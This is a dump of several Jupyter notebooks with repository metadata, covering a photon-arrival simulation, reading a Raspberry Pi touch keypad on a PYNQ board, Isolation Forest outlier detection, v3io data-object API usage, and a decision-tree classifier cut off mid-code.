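"# Editor's note: this is the quick check the author left commented out inside make_exposure.\nexp = make_exposure(500, 0, 1)\ndays = np.sum(exp.stop-exp.start); secs = days*24*3600\nexptot = np.sum(exp.exp)\nprint(f'average {exptot/secs:.0f} cm^2 for {secs/1e6:.1f} Ms')\nexp.head()",
"_____no_output_____"
],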
[
"# export\nclass Simulation(object):\n\n def __init__(self, name, src_flux, tstart, tstop, bkg_rate=1e-6, efun=3000, wt_signif=0.1):\n \"\"\"\n - src_flux : source flux, scalar or function of days, typically around 1e-7\n - tstart, tstop :(days)\n - bkg_rate : background flux, scalar or function of day, typicaly 1e-6 for 4-deg cone\n - efun : scalar, function (of time in days) of the exposure/s. Typically 3000 cm^2 for fermi\n\n - wt_signif : now the width of the PSF in (r/rmax)**2 coordinates\n\n \"\"\"\n def check_scalar( f):\n if np.isscalar(f):\n fval = f\n return lambda t: fval\n return f\n self.name = name\n self.src_fun = check_scalar(src_flux)\n self.bkg_fun = check_scalar(bkg_rate)\n self.flux_fun = lambda t: src_fun(t)+bkg_fun(t)\n self.wt_signif=wt_signif\n\n self.exposure = make_exposure(efun, tstart, tstop)\n\n\n def run(self):\n times = []\n weights = []\n for start, stop, exp in self.exposure.itertuples(index=False,name=None):\n\n src = self.src_fun((start+stop)/2)\n bkg = self.bkg_fun((start+stop)/2)\n delta_t = (stop-start)*sec_per_day # tolal tim\n counts = (src+bkg) * exp #\n #print(f'From {start} to {stop}, exposure/s {exp/delta_t:.0f}, counts {counts:.0f}')\n new_times = generate_times(start, stop, counts)\n wfun = WeightFunction(wt_signif=self.wt_signif)\n new_wts = wfun.weights(s=src, b=bkg, n=len(new_times));\n\n assert len(new_times)==len(new_wts)\n times = np.append(times, new_times)\n weights = np.append(weights, new_wts)\n\n print(f'generated {len(times)} photons')\n self.photons=pd.DataFrame(dict(\n time=times,\n weight=weights.astype(np.float32),\n ))",
"_____no_output_____"
],
[
"#hide\ndef src_flare(t, tzero=15, width=0.25, amp=2):\n return 1e-6*(1 + amp*np.exp(-(t-tzero)**2/2/width))\nsim = Simulation('test_sim', src_flux=src_flare, tstart=0, tstop=10, )\n%time sim.run()",
"generated 5199 photons\nCPU times: user 18.1 s, sys: 0 ns, total: 18.1 s\nWall time: 18.1 s\n"
]
],
[
[
"## Test varying exposure\n",
"_____no_output_____"
]
],
[
[
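"# Editor's sketch (assumption): exercise the varying-exposure path promised by the heading\n# above, using a simple daily cosine modulation of the nominal 3000 cm^2.\nvarying_efun = lambda t: 3000*(1 + 0.5*np.cos(2*np.pi*t))\nsim2 = Simulation('test_varying_exposure', src_flux=1e-7, tstart=0, tstop=2, efun=varying_efun)\nsim2.run()\nsim2.photons.head()",
"_____no_output_____"
],
[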
"#hide\nfrom nbdev.export import notebook2script\nnotebook2script()\n!date",
"Converted 00_config.ipynb.\nConverted 01_data_man.ipynb.\nConverted 02_effective_area.ipynb.\nConverted 03_exposure.ipynb.\nConverted 03_sources.ipynb.\nConverted 04_load_data.ipynb.\nConverted 04_simulation.ipynb.\nConverted 05_source_data.ipynb.\nConverted 06_poisson.ipynb.\nConverted 07_loglike.ipynb.\nConverted 08_cell_data.ipynb.\nConverted 09_lightcurve.ipynb.\nConverted 14_bayesian.ipynb.\nConverted 90_main.ipynb.\nConverted 99_tutorial.ipynb.\nConverted index.ipynb.\nTue Aug 24 16:29:26 PDT 2021\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e706c92f17d08379c9105395960e3aa28bb2b43b | 6,611 | ipynb | Jupyter Notebook | boards/Pynq-Z2/base/notebooks/rpi/rpi_touchpad.ipynb | jackrosenthal/PYNQ | 788bf18529bc7a0564af4033ef3e246c03fc5b10 | [
"BSD-3-Clause"
] | 1,537 | 2016-09-26T22:51:50.000Z | 2022-03-31T13:33:54.000Z | boards/Pynq-Z2/base/notebooks/rpi/rpi_touchpad.ipynb | MakarenaLabs/PYNQ | 6f3113278e62b23315cf4e000df8f57fb53c4f6d | [
"BSD-3-Clause"
] | 414 | 2016-10-03T21:12:10.000Z | 2022-03-21T14:55:02.000Z | boards/Pynq-Z2/base/notebooks/rpi/rpi_touchpad.ipynb | MakarenaLabs/PYNQ | 6f3113278e62b23315cf4e000df8f57fb53c4f6d | [
"BSD-3-Clause"
] | 826 | 2016-09-23T22:29:43.000Z | 2022-03-29T11:02:09.000Z | 24.66791 | 119 | 0.504765 | [
[
[
"## Reading Values from Touch Keypad\n\nThis demonstration shows how to interact with the Raspberry Pi Touch Keypad.\nThe Raspberry Pi Touch Keypad is required (https://www.seeedstudio.com/Raspberry-Pi-Touch-Keypad-p-2772.html).\n\n\n\nThe Raspberry Pi touch keypad supports up to 16 keys with adjustable \nsensitivity and built-in LD0.\nTouch keypad is read only, and has IIC interface\nconnected to SDA1 and SCL1 on the Raspberry Pi interface.\nThe I2C will read 2 bytes of data: `Data_0` and `Data_1`.\n* `Data_0`: B7 ~ B0 is TP0 ~ TP7 on/off status. 0 is key off, 1 is key on.\n* `Data_1`: B7 ~ B0 is TP8 ~ TP15 on/off status. 0 is key off, 1 is key on.\n\n### 1. Prepare the overlay\nDownload the overlay first, then select the shared pin to be connected to\nRPI header (by default, the pins will be connected to PMODA instead).",
"_____no_output_____"
]
],
[
[
"from pynq.overlays.base import BaseOverlay\n\nbase = BaseOverlay(\"base.bit\")\nbase.select_rpi()",
"_____no_output_____"
]
],
[
[
"### 2. Instantiate the Microblaze\nThe Microblaze will control the pins on the RASPBERRYPI header.",
"_____no_output_____"
]
],
[
[
"%%microblaze base.RPI\n\n#include \"xio_switch.h\"\n#include \"circular_buffer.h\"\n#include \"i2c.h\"\n\n// Device constants\n#define TOUCHPAD_DEV_ADDRESS 0x57\n\nunsigned int get_touchpad_reg_value(){\n uint8_t data[2];\n i2c device = i2c_open_device(1);\n set_pin(2, SDA1);\n set_pin(3, SCL1);\n i2c_read(device, TOUCHPAD_DEV_ADDRESS, data, 2);\n return (unsigned int) ((data[0] << 8) + data[1]);\n}",
"_____no_output_____"
]
],
[
[
"### 3. Read the key values\nThe available pin names are listed below.",
"_____no_output_____"
]
],
[
[
"PIN_MAPPING = {'circle': 0,\n 'cross': 1,\n 'square': 2,\n 'r': 3,\n 'home': 4,\n '+': 5,\n '-': 6,\n 'l': 7,\n 'down': 8,\n 'right': 9,\n 'up': 10,\n 'left': 11,\n 'power': 12,\n 'rpi': 13,\n 'logo': 14,\n 'triangle': 15\n }",
"_____no_output_____"
]
],
[
[
"To convert the raw data into the value for each key, we define the following\nfunctions.",
"_____no_output_____"
]
],
[
[
"def reg2int(reg_value, key_number):\n return \"{0:b}\".format(reg_value).zfill(16)[-(key_number+1)]\n\ndef get_touchpad(key_name):\n reg_value = get_touchpad_reg_value()\n key_number = PIN_MAPPING[key_name]\n return reg2int(reg_value, key_number)",
"_____no_output_____"
]
],
[
[
"Run the following code without pressing any button.",
"_____no_output_____"
]
],
[
[
"get_touchpad('home')",
"_____no_output_____"
]
],
[
[
"While pressing gently on the home button of the touch keypad, run the following code.",
"_____no_output_____"
]
],
[
[
"get_touchpad('home')",
"_____no_output_____"
]
],
[
[
"While pressing the right arrow and square at the same time, \nrun the following code. Note that there are 2 read commands issued,\nalthough 1 read command can get values for all the keys.",
"_____no_output_____"
]
],
[
[
"for key in ['right', 'square']:\n print('Key {} reads value {}.'.format(key, get_touchpad(key)))",
"Key right reads value 1.\nKey square reads value 1.\n"
]
],
[
[
"### 4. Cleanup\nSwitch back the connection on the shared pin to PMODA header.",
"_____no_output_____"
]
],
[
[
"base.select_pmoda()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e706cf9a1a7168854cdb72ffe500464e3eee29a8 | 115,697 | ipynb | Jupyter Notebook | Chapter01/Anomaly Detection with Isolation Forest/Anomaly_Detection_with_Isolation_Forest.ipynb | Browin123/Cybersecurity | 12f544fb0ea954dfbf804f4d67f148218eb58beb | [
"MIT"
] | 1 | 2021-01-05T13:33:20.000Z | 2021-01-05T13:33:20.000Z | Chapter01/Anomaly Detection with Isolation Forest/Anomaly_Detection_with_Isolation_Forest.ipynb | urantialife/Machine-Learning-for-Cybersecurity-Cookbook | 998fdd00b210f8203d906ff05b99908b001bf3a3 | [
"MIT"
] | 1 | 2021-06-11T18:04:48.000Z | 2021-06-11T18:04:48.000Z | Chapter01/Anomaly Detection with Isolation Forest/Anomaly_Detection_with_Isolation_Forest.ipynb | urantialife/Machine-Learning-for-Cybersecurity-Cookbook | 998fdd00b210f8203d906ff05b99908b001bf3a3 | [
"MIT"
] | null | null | null | 281.501217 | 35,952 | 0.913844 | [
[
[
"import numpy as np\nimport pandas as pd\n\nrandom_seed = np.random.RandomState(12)",
"_____no_output_____"
],
[
"X_train = 0.5 * random_seed.randn(500, 2)\nX_train = np.r_[X_train + 3, X_train]\nX_train = pd.DataFrame(X_train, columns=[\"x\", \"y\"])",
"_____no_output_____"
],
[
"X_test = 0.5 * random_seed.randn(500, 2)\nX_test = np.r_[X_test + 3, X_test]\nX_test = pd.DataFrame(X_test, columns=[\"x\", \"y\"])",
"_____no_output_____"
],
[
"X_outliers = random_seed.uniform(low=-5, high=5, size=(50, 2))\nX_outliers = pd.DataFrame(X_outliers, columns=[\"x\", \"y\"])",
"_____no_output_____"
],
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\n\np1 = plt.scatter(X_train.x, X_train.y, c=\"white\", s=50, edgecolor=\"black\")\np2 = plt.scatter(X_test.x, X_test.y, c=\"green\", s=50, edgecolor=\"black\")\np3 = plt.scatter(X_outliers.x, X_outliers.y, c=\"blue\", s=50, edgecolor=\"black\")\nplt.xlim((-6, 6))\nplt.ylim((-6, 6))\nplt.legend(\n [p1, p2, p3],\n [\"training set\", \"normal testing set\", \"anomalous testing set\"],\n loc=\"lower right\",\n)\n\nplt.show()",
"_____no_output_____"
],
[
"from sklearn.ensemble import IsolationForest\n\nclf = IsolationForest()\nclf.fit(X_train)\ny_pred_train = clf.predict(X_train)\ny_pred_test = clf.predict(X_test)\ny_pred_outliers = clf.predict(X_outliers)",
"/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:213: FutureWarning: default contamination parameter 0.1 will change in version 0.22 to \"auto\". This will change the predict method behavior.\n FutureWarning)\n/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:223: FutureWarning: behaviour=\"old\" is deprecated and will be removed in version 0.22. Please use behaviour=\"new\", which makes the decision_function change to match other anomaly detection algorithm API.\n FutureWarning)\n/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:417: DeprecationWarning: threshold_ attribute is deprecated in 0.20 and will be removed in 0.22.\n \" be removed in 0.22.\", DeprecationWarning)\n/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:417: DeprecationWarning: threshold_ attribute is deprecated in 0.20 and will be removed in 0.22.\n \" be removed in 0.22.\", DeprecationWarning)\n/Library/Frameworks/Python.framework/Versions/3.6/lib/python3.6/site-packages/sklearn/ensemble/iforest.py:417: DeprecationWarning: threshold_ attribute is deprecated in 0.20 and will be removed in 0.22.\n \" be removed in 0.22.\", DeprecationWarning)\n"
],
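[
"# Editor's sketch (assumption): quantify the separation; predictions are +1 for inliers\n# and -1 for outliers.\nnormal_kept = np.mean(y_pred_test == 1)\noutliers_flagged = np.mean(y_pred_outliers == -1)\nprint('normal test points kept: {:.1%}'.format(normal_kept))\nprint('outliers flagged: {:.1%}'.format(outliers_flagged))",
"_____no_output_____"
],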
[
"X_outliers = X_outliers.assign(pred=y_pred_outliers)\nX_outliers.head()",
"_____no_output_____"
],
[
"p1 = plt.scatter(X_train.x, X_train.y, c=\"white\", s=50, edgecolor=\"black\")\np2 = plt.scatter(\n X_outliers.loc[X_outliers.pred == -1, [\"x\"]],\n X_outliers.loc[X_outliers.pred == -1, [\"y\"]],\n c=\"blue\",\n s=50,\n edgecolor=\"black\",\n)\np3 = plt.scatter(\n X_outliers.loc[X_outliers.pred == 1, [\"x\"]],\n X_outliers.loc[X_outliers.pred == 1, [\"y\"]],\n c=\"red\",\n s=50,\n edgecolor=\"black\",\n)\n\nplt.xlim((-6, 6))\nplt.ylim((-6, 6))\nplt.legend(\n [p1, p2, p3],\n [\"training observations\", \"detected outliers\", \"incorrectly labeled outliers\"],\n loc=\"lower right\",\n)\n\nplt.show()",
"_____no_output_____"
],
[
"X_test = X_test.assign(pred=y_pred_test)\nX_test.head()",
"_____no_output_____"
],
[
"p1 = plt.scatter(X_train.x, X_train.y, c=\"white\", s=50, edgecolor=\"black\")\np2 = plt.scatter(\n X_test.loc[X_test.pred == 1, [\"x\"]],\n X_test.loc[X_test.pred == 1, [\"y\"]],\n c=\"blue\",\n s=50,\n edgecolor=\"black\",\n)\np3 = plt.scatter(\n X_test.loc[X_test.pred == -1, [\"x\"]],\n X_test.loc[X_test.pred == -1, [\"y\"]],\n c=\"red\",\n s=50,\n edgecolor=\"black\",\n)\n\nplt.xlim((-6, 6))\nplt.ylim((-6, 6))\nplt.legend(\n [p1, p2, p3],\n [\n \"training observations\",\n \"correctly labeled test observations\",\n \"incorrectly labeled test observations\",\n ],\n loc=\"lower right\",\n)\n\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706da6ed8f2e3c3e4631158a445cd86c3eb7602 | 15,206 | ipynb | Jupyter Notebook | data-ingestion-and-preparation/v3io-objects.ipynb | jasonnIguazio/tutorials | ee8e819137493fdd25a220c0ac524eaa3b27ea5e | [
"Apache-2.0"
] | 33 | 2019-02-11T17:02:57.000Z | 2022-03-07T19:39:47.000Z | data-ingestion-and-preparation/v3io-objects.ipynb | jasonnIguazio/tutorials | ee8e819137493fdd25a220c0ac524eaa3b27ea5e | [
"Apache-2.0"
] | 88 | 2019-03-27T22:18:14.000Z | 2021-01-28T12:22:52.000Z | data-ingestion-and-preparation/v3io-objects.ipynb | jasonnIguazio/tutorials | ee8e819137493fdd25a220c0ac524eaa3b27ea5e | [
"Apache-2.0"
] | 36 | 2019-01-03T14:08:56.000Z | 2022-03-22T16:30:06.000Z | 27.697632 | 313 | 0.572866 | [
[
[
"# Using the Platform's Data-Object API",
"_____no_output_____"
],
[
"The platform's Simple-Object API enables performing simple data-object operations that resembles Amazon’s Simple Storage Service (S3) API.\nIn addition to the S3-like capabilities, the Simple-Object Web API enables appending data to existing objects.",
"_____no_output_____"
],
[
"> **Note**: The Python API for accessing the data objects is provided as tech preview and is included in the current release as a sneak peek to future release features but without official support in this release.\n> Note that tech-preview features don't go through QA cycles and might result in unexpected behavior.\n> Please consult the Iguazio support team before using these features.\n> As an alternative, you can use the [data-object operations REST API](https://www.iguazio.com/docs/v3.0/data-layer/reference/web-apis/simple-object-web-api/data-object-operations/) which offers equivalent functionality and is officially supported.",
"_____no_output_____"
],
[
"## Initialize",
"_____no_output_____"
]
],
[
[
"import v3io.dataplane",
"_____no_output_____"
]
],
[
[
"Create a `dataplane` client:",
"_____no_output_____"
]
],
[
[
"v3io_client = v3io.dataplane.Client()",
"_____no_output_____"
]
],
[
[
"> **Note**: You can pass to the client the `endpoint` and `access_key` parameters explicitly.\n> The following code is equivalent to the default values:\n>\n> ``` python\n> from os import getenv\n> v3io_client = v3io.dataplane.Client(endpoint='http://v3io-webapi:8081',\n> access_key=getenv('V3IO_ACCESS_KEY'))\n> ```\n>\n> When running the code remotely, you can obtain the URL of your cluster by copying the API URL of the web-APIs service (`webapi`) from the **Services** dashboard page. You can select between two types of URLs:\n>\n> - **HTTPS Direct** (recommended) — a URL of the format `https://<tenant IP>:<web-APIs port>`; for example, `https://default-tenant.app.mycluster.iguazio.com:8443`.\n> - **HTTPS** — a URL of the format `https://webapi.<tenant IP>`; for example, `https://webapi.default-tenant.app.mycluster.iguazio.com`.\n>\n> For more information see the [Data-Service Web-API General Structure](https://www.iguazio.com/docs/v3.0/data-layer/reference/web-apis/data-service-web-api-gen-struct/) documentation.",
"_____no_output_____"
],
[
"> **Number of maximum parallel connections**: Another noteworthy parameter is `max_connections`, which defines the number of maximum parallel connections when performing batch operations.\n> If left unspecified, the default is 8 connections.\n> For more information see the [Put Multiple Objects](#Put-Multiple-Objects) section in this tutorial.",
"_____no_output_____"
],
[
"### Set the Data Path",
"_____no_output_____"
],
[
"All data in the platform is stored in user-defined data containers.\nThis tutorial uses the predefined \"users\" container.\nFor more information refer to the platform's [data-containers](https://www.iguazio.com/docs/v3.0/data-layer/containers/) documentation.",
"_____no_output_____"
]
],
[
[
"CONTAINER = 'users'",
"_____no_output_____"
]
],
[
[
"Set the data path for storing the NoSQL (KV) table:",
"_____no_output_____"
]
],
[
[
"from os import getenv, path\n\nV3IO_USERNAME = getenv('V3IO_USERNAME')\nOBJECTS_PATH = path.join(V3IO_USERNAME, 'examples', 'v3io', 'objects')",
"_____no_output_____"
]
],
[
[
"## Put Object",
"_____no_output_____"
],
[
"Use the `put` method to adds a new object:",
"_____no_output_____"
]
],
[
[
"text = \"It was the best of times,\\n\\\nit was the worst of times,\\n\\\nit was the age of wisdom,\\n\\\nit was the age of foolishness,\\n\\\nit was the epoch of belief,\\n\\\nit was the epoch of incredulity,\\n\\\n\" ",
"_____no_output_____"
],
[
"OBJECT = path.join(OBJECTS_PATH, 'The Period.txt')\nprint(f'Writing to {OBJECT}')\nresponse = v3io_client.object.put(container=CONTAINER, path=OBJECT, body=text)\nprint(f'Status code: {response.status_code}')",
"Writing to iguazio/examples/v3io/objects/The Period.txt\nStatus code: 200\n"
]
],
[
[
"## Get Object",
"_____no_output_____"
],
[
"Use the `get` method to retrieve an object:",
"_____no_output_____"
]
],
[
[
"response = v3io_client.object.get(container=CONTAINER, path=OBJECT)\nprint(response.body.decode('utf-8'))",
"It was the best of times,\nit was the worst of times,\nit was the age of wisdom,\nit was the age of foolishness,\nit was the epoch of belief,\nit was the epoch of incredulity,\n\n"
]
],
[
[
"## Append",
"_____no_output_____"
],
[
"You can also use the `put` to append data to an existing object.\n\n> **Note**: The option to append data extends the capabilities of the AWS S3 `PUT Object` operation.",
"_____no_output_____"
]
],
[
[
"text2=\"it was the season of Light,\\n\\\nit was the season of Darkness,\\n\\\nit was the spring of hope,\\n\\\nit was the winter of despair,\\n\\\n\"",
"_____no_output_____"
],
[
"response = v3io_client.object.put(container=CONTAINER, path=OBJECT, body=text2, append=True)\nprint(f'Status code: {response.status_code}')",
"Status code: 200\n"
],
[
"response = v3io_client.object.get(container=CONTAINER, path=OBJECT)\nprint(response.body.decode('utf-8'))",
"It was the best of times,\nit was the worst of times,\nit was the age of wisdom,\nit was the age of foolishness,\nit was the epoch of belief,\nit was the epoch of incredulity,\nit was the season of Light,\nit was the season of Darkness,\nit was the spring of hope,\nit was the winter of despair,\n\n"
]
],
[
[
"## Delete Object",
"_____no_output_____"
],
[
"Use the `delete` method to delete an object:",
"_____no_output_____"
]
],
[
[
"response = v3io_client.object.delete(container=CONTAINER, path=OBJECT)\nprint(response.status_code)",
"204\n"
]
],
[
[
"## Put Multiple Objects",
"_____no_output_____"
],
[
"To get the highest possible throughput, you can send many requests towards the data layer and wait for all the responses to arrive (rather than send each request and wait for the response).\nThe SDK supports this through batching.\nAny API call can be made through the client's built in `batch` object.\nThe API call receives the exact same arguments it would normally receive (except for `raise_for_status`), and does not block until the response arrives.\nTo wait for all pending responses, call the `wait` method of the `batch` object.",
"_____no_output_____"
],
[
"> **Note**: The number of parallel connections is determined by the `max_connections` parameter when you created the client. For instance, to set 16 parallel connections you should have in the beginning of the notebook `v3io_client = v3io.dataplane.Client(max_connections=16)`. The default is 8 connections.",
"_____no_output_____"
]
],
[
[
"# Template of word sequence\n\nnouns = ['time', 'person', 'year', 'way', 'day', 'thing', 'man', 'world', 'life', 'hand', 'part', 'child', 'eye', 'woman', 'place', 'work', 'week', 'case', 'point', 'government', 'company', 'number', 'group', 'problem', 'fact']\nadjectives = ['good', 'new', 'first', 'last', 'long', 'great', 'little', 'own', 'other', 'old', 'right', 'big', 'high', 'different', 'small', 'large', 'next', 'early', 'young', 'important', 'few', 'public', 'bad', 'same', 'able']\nprepositions = ['to', 'of', 'in', 'for', 'on', 'with', 'at', 'by', 'from', 'up', 'about', 'into', 'over', 'after']\nothers = ['the', 'that', 'this', 'my', 'one']\n\nsequence = [nouns, prepositions, others, adjectives, nouns]",
"_____no_output_____"
],
[
"import random\n\nrandom.seed(42)\n\n# Generate a sequence of words\n\nfor i in range(10):\n generated_text = \" \".join([random.choice(values) for values in sequence])\n print(generated_text)\n v3io_client.batch.object.put(container=CONTAINER, path=path.join(OBJECTS_PATH, f'obj_{i:02}'), body=generated_text)\n\n# Wait for all writes to complete\nresponses = v3io_client.batch.wait()",
"company of the same life\nworld for that same way\nnumber into one first point\nwoman to the first man\nworld from one good case\nman into one different world\nplace up this good fact\nthing into my right life\nday for this last year\neye of this big government\n"
]
],
[
[
"The looped `put` interface in the previous code block sends all `put` requests to the data layer in parallel.\nWhen `wait` is called, it blocks until either all responses arrive — in which case it returns a `Responses` object that contains the `responses` of each call — or an error occurs — in which case an exception is thrown.\nYou can pass `raise_for_status` to `wait`, and it behaves as previously explained.\n\n> **Note:** The `batch` object is stateful, therefore you can only create one batch at a time.\n> However, you can create multiple parallel batches yourself through the client's `create_batch` interface.",
"_____no_output_____"
],
[
"Display the contents of the first object:",
"_____no_output_____"
]
],
[
[
"response = v3io_client.object.get(container=CONTAINER, path=path.join(OBJECTS_PATH, 'obj_00'))\nprint(response.body.decode('utf-8'))",
"company of the same life\n"
]
],
[
[
"Use the file system to list the new objects:",
"_____no_output_____"
]
],
[
[
"from os import sep\nimport pathlib\n\nV3IO_OBJECTS_PATH = path.join(sep, 'v3io', CONTAINER, OBJECTS_PATH)\n\nprint(f\"obj_* files in {V3IO_OBJECTS_PATH}:\")\nfor file in pathlib.Path(V3IO_OBJECTS_PATH).glob(\"obj_*\"):\n print(file.name)",
"obj_* files in /v3io/users/iguazio/examples/v3io/objects:\nobj_00\nobj_01\nobj_02\nobj_03\nobj_04\nobj_05\nobj_06\nobj_07\nobj_08\nobj_09\n"
]
],
[
[
"## Delete the Objects",
"_____no_output_____"
],
[
"You can use the file-system interface to delete a objects directory from the relevant data container:",
"_____no_output_____"
]
],
[
[
"import shutil\nshutil.rmtree(V3IO_OBJECTS_PATH)",
"_____no_output_____"
]
],
[
[
"Alternatively, you can use the following command:",
"_____no_output_____"
]
],
[
[
"!rm -r $V3IO_OBJECTS_PATH",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
e706daf7df4ee3b56babee26d31d653a9f6cbf81 | 29,321 | ipynb | Jupyter Notebook | Project Decision Tree.ipynb | Atulmishra1596/Decision-Tree-Impplementation | da8ef083cab61417d89b383df40e55a6fea07ef8 | [
"MIT"
] | null | null | null | Project Decision Tree.ipynb | Atulmishra1596/Decision-Tree-Impplementation | da8ef083cab61417d89b383df40e55a6fea07ef8 | [
"MIT"
] | null | null | null | Project Decision Tree.ipynb | Atulmishra1596/Decision-Tree-Impplementation | da8ef083cab61417d89b383df40e55a6fea07ef8 | [
"MIT"
] | null | null | null | 39.094667 | 211 | 0.478735 | [
[
[
"class TreeNode:\n def __init__(self, data,output):\n # data represents the feature upon which the node was split when fitting the training data\n # data = None for leaf node\n self.data = data\n # children of a node are stored as a dicticionary with key being the value of feature upon which the node was split\n # and the corresponding value stores the child TreeNode\n self.children = {}\n # output represents the class with current majority at this instance of the decision tree\n self.output = output\n # index will be used to assign a unique index to each node\n self.index = -1\n \n def add_child(self,feature_value,obj):\n self.children[feature_value] = obj",
"_____no_output_____"
],
[
"from sklearn import datasets\nfrom sklearn.model_selection import train_test_split\ndata=datasets.load_iris()\ndata\nx=data.data\ny=data.target\nx_train,x_test,y_train,y_test=train_test_split(x,y)",
"_____no_output_____"
],
[
"class DecisionTreeClassifier:\n def __init__(self):\n # root represents the root node of the decision tree built after fitting the training data\n self.__root = None\n\n def __count_unique(self,Y):\n # returns a dictionary with keys as unique values of Y(i.e no of classes) and the corresponding value as its frequency\n d = {}\n for i in Y:\n if i not in d:\n d[i]=1\n else:\n d[i]+=1\n return d\n\n\n def __entropy(self,Y):\n # returns the entropy \n freq_map = self.__count_unique(Y)\n entropy_ = 0\n total = len(Y)\n for i in freq_map:\n p = freq_map[i]/total\n entropy_ += (-p)*math.log2(p)\n return entropy_\n\n def __gain_ratio(self,X,Y,selected_feature):\n # returns the gain ratio\n info_orig = self.__entropy(Y) # info_orig represents entropy before splitting\n info_f = 0 # info_f represents entropy after splitting upon the selected feature\n split_info = 0\n values = set(X[:,selected_feature])\n df = pd.DataFrame(X)\n # Adding Y values as the last column in the dataframe \n df[df.shape[1]] = Y\n initial_size = df.shape[0] \n for i in values:\n df1 = df[df[selected_feature] == i]\n current_size = df1.shape[0]\n info_f += (current_size/initial_size)*self.__entropy(df1[df1.shape[1]-1])\n split_info += (-current_size/initial_size)*math.log2(current_size/initial_size)\n\n # to handle the case when split info = 0 which leads to division by 0 error\n if split_info == 0 :\n return math.inf\n\n info_gain = info_orig - info_f\n gain_ratio = info_gain / split_info\n return gain_ratio\n\n def __gini_index(self,Y):\n # returns the gini index \n freq_map = self.__count_unique(Y)\n gini_index_ = 1\n total = len(Y)\n for i in freq_map:\n p = freq_map[i]/total\n gini_index_ -= p**2\n return gini_index_\n\n def __gini_gain(self,X,Y,selected_feature):\n # returns the gini gain\n gini_orig = self.__gini_index(Y) # gini_orig represents gini index before splitting\n gini_split_f = 0 # gini_split_f represents gini index after splitting upon the selected feature\n values = set(X[:,selected_feature])\n df = pd.DataFrame(X)\n # Adding Y values as the last column in the dataframe \n df[df.shape[1]] = Y\n initial_size = df.shape[0] \n for i in values:\n df1 = df[df[selected_feature] == i]\n current_size = df1.shape[0]\n gini_split_f += (current_size/initial_size)*self.__gini_index(df1[df1.shape[1]-1])\n\n gini_gain_ = gini_orig - gini_split_f\n return gini_gain_\n\n\n def __decision_tree(self,X,Y,features,level,metric,classes):\n # returns the root of the Decision Tree(which consists of TreeNodes) built after fitting the training data\n # Here Nodes are printed as in PREORDER traversl\n # classes represents the different classes present in the classification problem \n # metric can take value gain_ratio or gini_index\n # level represents depth of the tree\n # We split a node on a particular feature only once (in a given root to leaf node path)\n \n \n # If the node consists of only 1 class\n if len(set(Y)) == 1:\n print(\"Level\",level)\n output = None\n for i in classes:\n if i in Y:\n output = i\n print(\"Count of\",i,\"=\",len(Y))\n else :\n print(\"Count of\",i,\"=\",0)\n if metric == \"gain_ratio\":\n print(\"Current Entropy is = 0.0\")\n elif metric == \"gini_index\":\n print(\"Current Gini Index is = 0.0\")\n\n print(\"Reached leaf Node\")\n print()\n return TreeNode(None,output)\n\n # If we have run out of features to split upon\n # In this case we will output the class with maximum count\n if len(features) == 0:\n print(\"Level\",level)\n freq_map = self.__count_unique(Y)\n output = None\n max_count = 
-math.inf\n for i in classes:\n if i not in freq_map:\n print(\"Count of\",i,\"=\",0)\n else :\n if freq_map[i] > max_count :\n output = i\n max_count = freq_map[i]\n print(\"Count of\",i,\"=\",freq_map[i])\n\n if metric == \"gain_ratio\":\n print(\"Current Entropy is =\",self.__entropy(Y))\n elif metric == \"gini_index\":\n print(\"Current Gini Index is =\",self.__gini_index(Y)) \n\n print(\"Reached leaf Node\")\n print()\n return TreeNode(None,output)\n\n \n # Finding the best feature to split upon\n max_gain = -math.inf\n final_feature = None\n for f in features :\n if metric == \"gain_ratio\":\n current_gain = self.__gain_ratio(X,Y,f)\n elif metric ==\"gini_index\":\n current_gain = self.__gini_gain(X,Y,f)\n\n if current_gain > max_gain:\n max_gain = current_gain\n final_feature = f\n\n print(\"Level\",level)\n freq_map = self.__count_unique(Y)\n output = None\n max_count = -math.inf\n\n for i in classes:\n if i not in freq_map:\n print(\"Count of\",i,\"=\",0)\n else :\n if freq_map[i] > max_count :\n output = i\n max_count = freq_map[i]\n print(\"Count of\",i,\"=\",freq_map[i])\n\n if metric == \"gain_ratio\" : \n print(\"Current Entropy is 